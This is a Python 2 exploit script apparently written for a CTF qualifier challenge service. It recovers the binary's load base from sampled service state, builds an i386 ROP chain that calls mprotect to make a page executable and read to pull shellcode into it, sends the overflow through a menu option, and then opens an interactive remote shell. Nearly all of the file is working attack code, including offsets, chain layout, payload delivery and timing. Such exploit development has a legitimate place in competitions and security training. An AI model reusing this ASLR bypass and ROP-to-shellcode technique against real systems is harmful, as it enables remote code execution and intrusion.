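"""Exploit driver for the `fuckup` challenge service (CTF quals style).

Written for Python 2 (str is bytes; the b'' prefixes below are no-ops there
and keep the byte handling honest if the file is ever run on 3).  Flow, as
visible in this file:

  1. sample the service's "state" (menu item 3) 32 times,
  2. hand the samples to rnd.get_base() to recover the binary's load base
     (the recovery itself lives in rnd.py, not here),
  3. send a ROP chain through menu item 4 that mprotect()s the first page at
     `base` RWX, read()s 0x100 bytes from stdin into it and returns into it,
  4. send i386 shellcode as the payload of that read() and go interactive.

Remote, sh and anything else not defined here come from `codez` (assumed to
be a pwntools-like socket wrapper; not visible in this file).
"""
from __future__ import print_function

# The star-import stays first, as in the original, so that the explicit
# stdlib imports below win if codez happens to export a same-named symbol.
from codez import *  # noqa: F403 -- provides Remote, sh

import struct
import sys
import time

import rnd


# Default target; override with `python exploit.py HOST PORT`.
DEFAULT_HOST = 'fuckup_56f604b0ea918206dcb332339a819344.quals.shallweplayaga.me'
DEFAULT_PORT = 2000

# Size of the buffer behind menu item 4.  vuln() always sends exactly this
# many bytes, split into two writes (see vuln()).
VULN_BUF_SIZE = 100

# Offsets relative to the recovered load base.  Only what the chain itself
# shows is stated here; the instructions behind each offset are not visible
# in this file -- confirm against the binary before reusing them.
OFF_READ = 0x8AF      # call target used as read(fd, addr, size)
OFF_MPROTECT = 0x801  # call target used as mprotect(addr, size, prot)
OFF_POP3_RET = 0x61f  # return address placed after each call; presumably a
                      # pop;pop;pop;ret that discards the three arguments
PROT_RWX = 7          # PROT_READ | PROT_WRITE | PROT_EXEC

# Number of consecutive state samples handed to rnd.get_base(); presumably
# what its recovery algorithm requires -- see rnd.py.
STATE_SAMPLES = 32


class F(Remote):
    """Thin protocol wrapper around the challenge's numbered menu."""

    def _write_no_rand(self, x):
        """Send str(x) one character at a time with a 0.4 s pause after each.

        Why the pacing is needed is not visible here; the name hints that
        the service behaves randomly on a fast burst.  The delay is
        empirical -- confirm against the service before changing it.
        """
        for ch in str(x):
            self.write(ch)
            time.sleep(0.4)

    def _cmd(self, n):
        """Wait for the menu prompt and select item n.

        Consumes output up to and including the literal '0.' and then the
        next six bytes (presumably the rest of that prompt line), then sends
        n followed by a newline using the paced writer.
        """
        self.read('0.')
        self.read(6)
        self._write_no_rand(str(n) + "\n")

    def show_info(self):
        """Menu item 1: echo the three lines the service answers with.

        The original used a Python 2 trailing-comma print; read("\\n") is
        assumed to return each line with its newline, so nothing is added.
        """
        self._cmd(1)
        for _ in range(3):
            print(self.read("\n"), end='')

    def get_state(self):
        """Menu item 3: return the service's reported state as an int.

        The reply is one line whose last space-separated token is a hex
        number; anything else makes int() raise ValueError.
        """
        self._cmd(3)
        reply = self.read("\n")
        return int(reply.split(' ')[-1].strip(), 16)

    def vuln(self, data, last=1):
        """Menu item 4: deliver `data` into the VULN_BUF_SIZE-byte buffer.

        The buffer is filled in two writes: `data` NUL-padded to
        VULN_BUF_SIZE - last bytes, a one-second pause, then `last` NUL
        bytes.  Why the split is needed is not visible here; the original
        did it, so it is kept as-is.

        Raises ValueError if `data` does not fit or `last` is out of range.
        The original silently sent an over-long first stage (ljust never
        truncates), which shifts the whole layout without any warning; the
        check runs before the menu is touched so a bad payload never reaches
        the service.
        """
        first_len = VULN_BUF_SIZE - last
        if last < 0 or first_len < 0:
            raise ValueError("last must be between 0 and %d" % VULN_BUF_SIZE)
        if len(data) > first_len:
            raise ValueError("payload is %d bytes but the first stage holds %d"
                             % (len(data), first_len))
        self._cmd(4)
        stage = data.ljust(first_len, b"\x00")
        for _ in range(2):
            self.read("\n")
        self.write(stage)
        time.sleep(1)
        self.write(b"\x00" * last)


def gen_rop(base):
    """Build the ROP chain for a binary loaded at `base` (i386, little-endian).

    Layout, one 4-byte little-endian word each:
        mprotect(base, 0x1000, PROT_RWX)   -- make the first page RWX
        read(0, base, 0x100)               -- pull the shellcode in from stdin
        base                               -- return into it

    Each call is [target, pop3ret, arg1, arg2, arg3], so the chain is
    5 + 5 + 1 = 11 words = 44 bytes.  Byte order is explicit so the chain
    does not depend on the attacking host (the original used native 'I').
    struct.error propagates for values outside 32 bits, as before.
    """
    def word(v):
        return struct.pack('<I', v)

    def call3(target, a, b, c):
        return [word(target), word(base + OFF_POP3_RET), word(a), word(b), word(c)]

    chain = []
    chain += call3(base + OFF_MPROTECT, base, 0x1000, PROT_RWX)
    chain += call3(base + OFF_READ, 0, base, 0x100)
    chain.append(word(base))
    return b''.join(chain)


def main(argv):
    """Run the attack end to end against HOST PORT (defaults above)."""
    host = argv[1] if len(argv) > 1 else DEFAULT_HOST
    port = int(argv[2]) if len(argv) > 2 else DEFAULT_PORT
    r = F(host, port)

    # Each sample is offset by one before being handed over, as in the
    # original; the reason lives in rnd.get_base(), not here.
    samples = [1 + r.get_state() for _ in range(STATE_SAMPLES)]
    base = rnd.get_base(samples)
    print('[+] base', hex(base))
    sys.stdout.flush()

    # 22 bytes of filler put the first chain word where the service takes
    # its return address (per the original exploit); 22 + 44 = 66 bytes,
    # well inside the 99-byte first stage.
    r.vuln(b'A' * 22 + gen_rop(base))

    print('[*] wait for shell...')
    sys.stdout.flush()
    # The chain's read(0, base, 0x100) should now be pending; give the
    # service a moment to reach it before feeding the shellcode.  This is
    # timing-based, exactly as in the original.
    time.sleep(0.5)
    r.write(sh('i386'))
    r.interactive()


if __name__ == '__main__':
    main(sys.argv)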